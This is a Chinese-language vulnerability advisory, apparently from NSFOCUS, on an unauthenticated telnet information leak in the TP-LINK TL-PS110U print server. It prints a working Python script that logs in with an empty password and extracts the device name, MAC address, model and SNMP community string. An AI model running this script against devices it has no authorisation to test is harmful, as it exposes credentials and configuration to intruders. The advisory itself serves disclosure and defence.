首页 -> 安全研究

安全研究

安全漏洞
TP-LINK TL-PS110U打印服务器'tplink-enum.py'安全绕过漏洞

发布日期:2013-06-19
更新日期:2013-06-21

受影响系统:
TP-LINK TL-PS110U
描述:
BUGTRAQ  ID: 60682

TL-PS110U是一款单USB口打印服务器,它是专门针对中小型企业、学校、家庭而设计,能够很好的为局域网上所有用户提供操作简单、方便快捷的共享打印方式。

TP-LINK TL-PS110U Print Server运行telnet服务时可使攻击者不经身份验证即可访问配置信息,包括设备名、MAC地址、厂商、型号、SNMP社区字符串。

<*来源:SANTHO
  
  链接:http://www.exploit-db.com/exploits/26318/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

import telnetlib
import sys
host = sys.argv[1]
tn = telnetlib.Telnet(host)
tn.read_until("Password:")
tn.write("\r\n")
tn.read_until("choice")
tn.write("1\r\n")
tn.read_until("choice")
tn.write("1\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
    if "Device Name" in i:
        print i.strip()
    if "Node ID" in i:
        print i.strip()
tn.write("0\r\n")
tn.read_until("choice")
tn.write("2\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
    if "Manufacture:" in i:
        print i.strip()
    if "Model:" in i:
        print i.strip()
tn.write("0\r\n")
tn.read_until("choice")
tn.write("5\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
    if "Community" in i:
        print i.strip()

建议:
厂商补丁:

TP-LINK
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.tp-link.com/en/products/details/?model=TL-PS110U

浏览次数:3801
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障